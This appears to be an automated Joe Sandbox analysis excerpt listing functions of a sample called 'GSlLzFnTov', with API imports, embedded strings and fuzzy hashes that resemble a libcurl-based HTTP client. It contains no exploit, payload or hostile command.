Opcode ID: b14d308005be2bdef438f697b1ca9294f313fd3f6abe10cda276aba92b396e27
Instruction ID: 13062e447ce6abddd59c46ba52c8102d757c2e9377b6bc6af35c2cffaed432b6
Opcode Fuzzy Hash: b14d308005be2bdef438f697b1ca9294f313fd3f6abe10cda276aba92b396e27
Instruction Fuzzy Hash: 13A2B022F0968286EB64EB2581403BDA7B1AB45BD8F844235CE2D577D6DFBCE445C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D920D0 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 160
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_scwprintf.LIBCMT ref: 00007FF7F1D92130
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D9218C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D921CE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D921E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92200
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D9221E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D92229
__swprintf_l.LIBCMT ref: 00007FF7F1D92250
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D92273
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7F1D9229D
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D922AD
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D922BE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D922CC
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D922D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D922F7

Strings

Remote filename has no length!, xrefs: 00007FF7F1D92313
overflow in filename generation, xrefs: 00007FF7F1D921D4
%s/%s, xrefs: 00007FF7F1D92129
out of memory, xrefs: 00007FF7F1D9213D, 00007FF7F1D921EE
Failed to open the file %s: %s, xrefs: 00007FF7F1D922DD

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$free$__swprintf_l_close_fdopen_scwprintffopenmallocstrerror
String ID: %s/%s$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
API String ID: 1133054535-2634015058
Opcode ID: fd7843c592cadf858fd699cd2ed77d7019034f0bc63c45a1d72f214499512e42
Instruction ID: d621fca5e74660f3d55a3e138c5098ac958d998b92c631fd3d73648a600a3def
Opcode Fuzzy Hash: fd7843c592cadf858fd699cd2ed77d7019034f0bc63c45a1d72f214499512e42
Instruction Fuzzy Hash: 6761C561A0C64285FB28BB21A8441B9A3B0BF41B94FC48638CA3D073D5DFFCE545C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCA370 Relevance: 33.6, APIs: 3, Strings: 16, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DCA44B
_scwprintf.LIBCMT ref: 00007FF7F1DCA4F0
_scwprintf.LIBCMT ref: 00007FF7F1DCA54D

Strings

Referer, xrefs: 00007FF7F1DCA4D2
Proxy-Connection: Keep-Alive, xrefs: 00007FF7F1DCA6D0
1.0, xrefs: 00007FF7F1DCA613
Proxy-Connection, xrefs: 00007FF7F1DCA6A5, 00007FF7F1DCA6B9
%s , xrefs: 00007FF7F1DCA650
Accept, xrefs: 00007FF7F1DCA5A4
%s?%s, xrefs: 00007FF7F1DCA444
Accept: */*, xrefs: 00007FF7F1DCA5B3
upload completely sent off: %I64d out of %I64d bytes, xrefs: 00007FF7F1DCA965
Accept-Encoding: %s, xrefs: 00007FF7F1DCA53F
1.1, xrefs: 00007FF7F1DCA61E
, xrefs: 00007FF7F1DCA8E5
User-Agent, xrefs: 00007FF7F1DCA3EF
Accept-Encoding, xrefs: 00007FF7F1DCA507
HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 00007FF7F1DCA7FC
Referer: %s, xrefs: 00007FF7F1DCA4E9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: $ HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
API String ID: 1992661772-2069575521
Opcode ID: a02bf5786e98015dd1bbd5b72c3f788f676cc4b8921b4a34461da64a540e6929
Instruction ID: de71404c351a02f16ff4375fae2505c66bf82a1d75abf021eadc8a9838e9bab7
Opcode Fuzzy Hash: a02bf5786e98015dd1bbd5b72c3f788f676cc4b8921b4a34461da64a540e6929
Instruction Fuzzy Hash: 26027F71A08B8281EB59AF25E8502E9A3B4BF44B88F844535DE2D473D5EFBCE451C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDD3F8 Relevance: 31.9, APIs: 5, Strings: 13, Instructions: 379
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DDD4B9
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DDD4C9
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DDD6EA
inet_pton.WS2_32 ref: 00007FF7F1DDD718
inet_pton.WS2_32 ref: 00007FF7F1DDD72C

Part of subcall function 00007FF7F1DAEB80: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEBAC
Part of subcall function 00007FF7F1DAEB80: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEBB4

Strings

http/1.1, xrefs: 00007FF7F1DDD753
ALPN: offers %s, xrefs: 00007FF7F1DDD76B
schannel: unable to allocate memory, xrefs: 00007FF7F1DDD84C
Failed to set SNI, xrefs: 00007FF7F1DDD9D3
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00007FF7F1DDD9E9
http/1.1, xrefs: 00007FF7F1DDD760
schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00007FF7F1DDD9C2
schannel: initial InitializeSecurityContext failed: %s, xrefs: 00007FF7F1DDD904, 00007FF7F1DDD941
schannel: SNI or certificate check failed: %s, xrefs: 00007FF7F1DDD920
schannel: using IP address, SNI is not supported by OS., xrefs: 00007FF7F1DDD73E
schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 00007FF7F1DDD49A
wine_get_version, xrefs: 00007FF7F1DDD4C2
ntdll, xrefs: 00007FF7F1DDD4B2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: inet_pton$AddressErrorHandleLastModuleProc_errno_strdup
String ID: ALPN: offers %s$Failed to set SNI$http/1.1$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
API String ID: 2172631261-2757354814
Opcode ID: 0e9e4d07fba2867f5551be09efb5a75bc3989f10d8d794d355a4086cf7f47aa1
Instruction ID: aa553abbe8368a2908ebb66ce41e3ffcec790945ef69374217a91d150e887319
Opcode Fuzzy Hash: 0e9e4d07fba2867f5551be09efb5a75bc3989f10d8d794d355a4086cf7f47aa1
Instruction Fuzzy Hash: 22029D32A08A8686EB24EB25D4403ADB7B1FB45798F904235CA7E077D4CFBCE555C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC9618 Relevance: 28.5, APIs: 1, Strings: 15, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Content-Length: 0, xrefs: 00007FF7F1DC97DB
100-continue, xrefs: 00007FF7F1DC98C6, 00007FF7F1DC9A69
0, xrefs: 00007FF7F1DC9BD1, 00007FF7F1DC9CBB
Expect, xrefs: 00007FF7F1DC98AF, 00007FF7F1DC9A55
%x, xrefs: 00007FF7F1DC9B47
Content-Length: %I64d, xrefs: 00007FF7F1DC971E, 00007FF7F1DC9865, 00007FF7F1DC9A00
Failed sending HTTP request, xrefs: 00007FF7F1DC96B3
Content-Type, xrefs: 00007FF7F1DC9A1D
Failed sending HTTP POST request, xrefs: 00007FF7F1DC9D2E
Content-Type: application/x-www-form-urlencoded, xrefs: 00007FF7F1DC9A3B
Content-Length, xrefs: 00007FF7F1DC970A, 00007FF7F1DC9850, 00007FF7F1DC99EC
Failed sending POST request, xrefs: 00007FF7F1DC9819, 00007FF7F1DC99A2
Failed sending PUT request, xrefs: 00007FF7F1DC97B7
Expect:, xrefs: 00007FF7F1DC98CD, 00007FF7F1DC9A7B
%s, xrefs: 00007FF7F1DC9888

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: %s$%x$0$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request
API String ID: 0-502057143
Opcode ID: ba2daf0a40e8505729aeb6119f5725586f9dddc5ab41dae467808b02c8962ab7
Instruction ID: 92ed3a27c27107f7f0d72a5ca5601475ea28cb8018ea0d112dfd90f80400575d
Opcode Fuzzy Hash: ba2daf0a40e8505729aeb6119f5725586f9dddc5ab41dae467808b02c8962ab7
Instruction Fuzzy Hash: 5A12C161A0868295FB28EB2695102FAA7B4BB04B8CF844935CE3D476D5DFBCE551C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB3BA4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 223
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F1DB315C: htons.WS2_32 ref: 00007FF7F1DB31A6

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB3C24
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB3C2C

Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8

Part of subcall function 00007FF7F1DB4190: closesocket.WS2_32 ref: 00007FF7F1DB41D8

setsockopt.WS2_32 ref: 00007FF7F1DB3CB3
WSAGetLastError.WS2_32 ref: 00007FF7F1DB3CBD

Strings

Immediate connect fail for %s: %s, xrefs: 00007FF7F1DB3EB2
Could not set TCP_NODELAY: %s, xrefs: 00007FF7F1DB3CD4
Trying %s:%d..., xrefs: 00007FF7F1DB3C63
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F1DB3C43

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrclosesockethtonssetsockoptstrncpy
String ID: Trying %s:%d...$Could not set TCP_NODELAY: %s$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3201143625-1915463321
Opcode ID: f29599ba419f3726998d9c973b784c2487e8f97745410fb63b2f5a93399e771e
Instruction ID: 09e76cfcee166c22b81366a4342869c8a99730b01b5434fab5b9b20d9eea0ad9
Opcode Fuzzy Hash: f29599ba419f3726998d9c973b784c2487e8f97745410fb63b2f5a93399e771e
Instruction Fuzzy Hash: 0E91D622B0865365EB50EB5994043B9A3B0FF45B88FC04536ED2E077C5DFBCE944A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9F67B Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 108
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9F67F
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00000000,00007FF7F1D9A5FA), ref: 00007FF7F1D9F694
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9F6B4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9F705
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9F78F
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9F7CA

Strings

Build-time engines:, xrefs: 00007FF7F1D9F788
<none>, xrefs: 00007FF7F1D9F7C3
%s, xrefs: 00007FF7F1D9F7A2
--disable, xrefs: 00007FF7F1D9F6BE

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: puts$_strdupfreesetlocalestrncmp
String ID: %s$ <none>$--disable$Build-time engines:
API String ID: 1725776448-3801089455
Opcode ID: 3b5d007c6cd8395034576b3d22f1ce455d1556ab9dd6917d17eba8a94fde960d
Instruction ID: 25b48d138d4d1c9cc164ca6d62e90b8edcf14d6992d1611ec9a281cbc0686921
Opcode Fuzzy Hash: 3b5d007c6cd8395034576b3d22f1ce455d1556ab9dd6917d17eba8a94fde960d
Instruction Fuzzy Hash: A9418C25A0DA0291FF18FB11E49017DE6B1AF84B80FE44431D82E876DADFACE442C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBEA60 Relevance: 16.7, APIs: 11, Instructions: 170
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DBEAAB
getaddrinfo.WS2_32 ref: 00007FF7F1DBEACB
freeaddrinfo.WS2_32 ref: 00007FF7F1DBEBE9
WSASetLastError.WS2_32 ref: 00007FF7F1DBEC0B
WSAGetLastError.WS2_32 ref: 00007FF7F1DBEC1E
WSAGetLastError.WS2_32 ref: 00007FF7F1DBEC28
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F1DBEC3B
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F1DBEC4A
send.WS2_32 ref: 00007FF7F1DBEC87
WSAGetLastError.WS2_32 ref: 00007FF7F1DBEC91
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F1DBECA4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast$CriticalSection$Leave$Enter__swprintf_lfreeaddrinfogetaddrinfosend
String ID:
API String ID: 3847685897-0
Opcode ID: 1029e7bfa296ed6ce5bf69d66193a0b2a7e915dd05cf7dd7d5d43f62f75c9959
Instruction ID: 5bb674dcf98341eaa3c2b7ce7ece129dbf41498565876932fb0a2bdd1af1548d
Opcode Fuzzy Hash: 1029e7bfa296ed6ce5bf69d66193a0b2a7e915dd05cf7dd7d5d43f62f75c9959
Instruction Fuzzy Hash: 60718B32A08A4296E764EF15E444769B7B0FB88B54F858235DA6F433D4CFBCE445E3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DEB58C Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7F1DEB5A0

Part of subcall function 00007FF7F1DEB284: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7F1DEB2A6

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7F1DEB5B5
__scrt_release_startup_lock.LIBCMT ref: 00007FF7F1DEB623
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DEB671
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DEB676
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DEB67E
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DEB686
__scrt_is_managed_app.LIBCMT ref: 00007FF7F1DEB69A
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DEB6A8
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DEB702

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 3919418531-0
Opcode ID: d4c35d9c68fc9c39da4a08c198358b3b14512b8affd0c6335af82e4662f8cb39
Instruction ID: 7b3e72fec669ffdee81e5d561c2c114e524909373f59a30eee72cfb2c0c6c175
Opcode Fuzzy Hash: d4c35d9c68fc9c39da4a08c198358b3b14512b8affd0c6335af82e4662f8cb39
Instruction Fuzzy Hash: D0310A21A0A50382EB1CBB6194513B9A2B1AF45786FC4C039D92D0B2E7DFACF405C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBEDB4 Relevance: 13.6, APIs: 9, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DBEF88

Part of subcall function 00007FF7F1DBE8A4: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F1DBE926

_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DBEEA7

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CriticalInitializeSection_beginthreadex_errno
String ID:
API String ID: 1308403940-0
Opcode ID: 10b75673204b49a415d22fec0ab304a5bd434f6fd44a5e68bd3ec5ad22386fd7
Instruction ID: 7eec10d8702e9b285f96961822deb936ad7720a418d00bf5d93610824a1042c5
Opcode Fuzzy Hash: 10b75673204b49a415d22fec0ab304a5bd434f6fd44a5e68bd3ec5ad22386fd7
Instruction Fuzzy Hash: 34518036A08B81D6E718EF25E944169B3B0FB88B95F844534DE6E133A4CFBCE064D790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93C00 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_scwprintf.LIBCMT ref: 00007FF7F1D93C4F
_scwprintf.LIBCMT ref: 00007FF7F1D93C60
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D93CAE
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93CB8

Strings

%s\%c%s, xrefs: 00007FF7F1D93C48
._, xrefs: 00007FF7F1D93C19
%s\%s, xrefs: 00007FF7F1D93C59

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf$_close_strdup
String ID: %s\%c%s$%s\%s$._
API String ID: 2153715164-4149339551
Opcode ID: 74f090b0571ed39cef038922287079c43ba7b3911ef1e71206a0cb0fb7af7eca
Instruction ID: 8c1ce1762cfb6d5a1c59f1def9e9446adfbe9325c28024eec4d3c5f703500137
Opcode Fuzzy Hash: 74f090b0571ed39cef038922287079c43ba7b3911ef1e71206a0cb0fb7af7eca
Instruction Fuzzy Hash: 50116011A0DA9A51EB04FB63A9800BAD6B0AF44B90FC44434DD3D467E5DFBCE04283A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9A3F0 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON

Download Yara Rule

APIs

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1D9A455
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1D9A475
WSACleanup.WS2_32 ref: 00007FF7F1D9A48E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A49E
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A4B7
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A4D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A4DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A503

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$FreeLibraryfclose$Cleanup
String ID:
API String ID: 2673440117-0
Opcode ID: c8dba129fa9e4224a65ac5167fe942a4234cdd52bc3a0e15343bb17c425e0045
Instruction ID: 31307a889c14359ee1a3bd8726882947b15a882f89668aba8c77b47989f2b6d3
Opcode Fuzzy Hash: c8dba129fa9e4224a65ac5167fe942a4234cdd52bc3a0e15343bb17c425e0045
Instruction Fuzzy Hash: CF410B26A0DB4296E759AF51E944178B370FF44B52FC84534DA6E03BA1DFBCF4A083A0

Uniqueness

Uniqueness Score: -1.00%

